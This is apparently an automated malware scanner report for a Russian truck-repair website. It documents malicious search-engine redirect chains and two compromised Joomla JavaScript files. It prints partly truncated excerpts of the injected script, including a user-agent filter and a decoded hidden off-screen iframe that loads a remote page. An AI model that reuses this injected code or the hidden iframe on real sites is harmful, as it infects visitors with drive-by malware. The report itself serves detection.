New scan:

Malware Scanner report for gruzosto.ru

Malicious/Suspicious/Total urls checked
2/0/15
2 pages have malicious code. See details below
Blacklists
Found
The website is marked by Yandex as suspicious.

The website "gruzosto.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL. The chain of malicious redirects found:
->http://t87e.gu.ma/
638 websites infected.
->http://weras.isasecret.com
5 websites infected.

The website "gruzosto.ru" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=gruzosto.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://gruzosto.ru/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://gruzosto.ru/
(imitation of visitor from search engine)

GET / HTTP/1.1
Host: gruzosto.ru
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 302 Found
Connection: close
Date: Thu, 25 Sep 2014 18:17:26 GMT
Location: http://t87e.gu.ma/
Server: nginx
Content-Length: 0
Content-Type: text/html; charset=UTF-8
malicious
URL: http://t87e.gu.ma/
(imitation of visitor from search engine)

GET / HTTP/1.1
Host: t87e.gu.ma
Referer: http://www.google.com/search?q=redirect+check2
HTTP/1.1 301 Found
Connection: close
Date: Thu, 25 Sep 2014 18:14:10 GMT
Location: http://weras.isasecret.com
Server: Apache/2.2.15
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.3.3
malicious

Scanned pages/files

RequestServer responseStatus
http://gruzosto.ru/
200 OK
Content-Length: 47410
Content-Type: text/html
clean
http://gruzosto.ru/media/system/js/core.js
200 OK
Content-Length: 6146
Content-Type: text/javascript
clean
http://gruzosto.ru/media/system/js/mootools-core.js
200 OK
Content-Length: 90461
Content-Type: text/javascript
clean
http://gruzosto.ru/media/system/js/caption.js
200 OK
Content-Length: 2721
Content-Type: text/javascript
clean
http://gruzosto.ru/media/system/js/mootools-more.js
200 OK
Content-Length: 240049
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function ddd_prover_ua(){
var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox
... 3172 bytes are skipped ...
‘在同一月份。 ",creditcard:"您輸入的信用卡號碼不正確。當前已輸入{length}個字符。 "});
Form.Validator.add("validate-currency-yuan",{errorMsg:function(){return Form.Validator.getMsg("currencyYuan");},test:function(a){return Form.Validator.getValidator("IsEmpty").test(a)||(/^ï¿¥?\-?([1-9]{1}[0-9]{0,2}(\,[0-9]{3})*(\.[0-9]{0,2})?|[1-9]{1}\d*(\.[0-9]{0,2})?|0(\.[0-9]{0,2})?|(\.[0-9]{1,2})?)$/).test(a.get("value"));
}});;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Antivirus reports:

Avast
JS:Iframe-EHG [Trj]
DrWeb
JS.IFrame.564
Microsoft
Trojan:JS/Iframe.DI

http://gruzosto.ru/plugins/system/helix/js/menu.js
200 OK
Content-Length: 6085
Content-Type: text/javascript
clean
http://gruzosto.ru/plugins/system/helix/js/totop.js
200 OK
Content-Length: 2950
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function ddd_prover_ua(){
var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox
... 1501 bytes are skipped ...
oString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('2.1(\'7\',5(){3 0=6.9(\'a\');8(0){3 b=4 c.i(2);0.1(\'h\',5(e){4 g(e).f();b.d()})}});',19,19,'toplink|addEvent|window|var|new|function|document|domready|if|id|topofpage||Fx|toTop||stop|Event|click|Scroll'.split('|'),0,{}));;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Decoded script:


window.addEvent('domready',function(){var toplink=document.id('topofpage');if(toplink){var b=new Fx.Scroll(window);toplink.addEvent('click',function(e){new Event(e).stop();b.toTop()})}});
window.addEvent('domready',function(){var toplink=document.id('topofpage');if(toplink){var b=new Fx.Scroll(window);toplink.addEvent('click',function(e){new Event(e).stop();b.toTop()})}});
<iframe src="http://ehehtafeg.netishyn.org/jtrjffHDAJJF7.html" style="position:absolute;left:-1409px;top:-1409px;" height="170" width="170" name="Achtamar"></iframe>

Antivirus reports:

DrWeb
SCRIPT.Virus

http://gruzosto.ru/modules/mod_slideshow_pro_sp2/assets/js/script.js
200 OK
Content-Length: 8509
Content-Type: text/javascript
clean
http://gruzosto.ru/2012-02-02-11-46-50/remont-dvigatelya.html
200 OK
Content-Length: 25535
Content-Type: text/html
clean
http://gruzosto.ru/2012-02-02-11-46-50/remont-hodovoi-chasti.html
200 OK
Content-Length: 26587
Content-Type: text/html
clean
http://gruzosto.ru/2012-02-02-11-46-50/remont-tormoznoj-sistemy.html
200 OK
Content-Length: 26139
Content-Type: text/html
clean
http://gruzosto.ru/2012-02-02-11-46-50/remont-korobki-peredach.html
200 OK
Content-Length: 27603
Content-Type: text/html
clean
http://gruzosto.ru/2012-02-02-11-46-50/remont-rulevogo-upravleniya.html
200 OK
Content-Length: 24487
Content-Type: text/html
clean
http://gruzosto.ru/2012-02-02-11-46-50/remont-vedushchego-mosta.html
200 OK
Content-Length: 21402
Content-Type: text/html
clean
http://gruzosto.ru/2012-02-02-11-46-50/remont-stsepleniya.html
200 OK
Content-Length: 25064
Content-Type: text/html
clean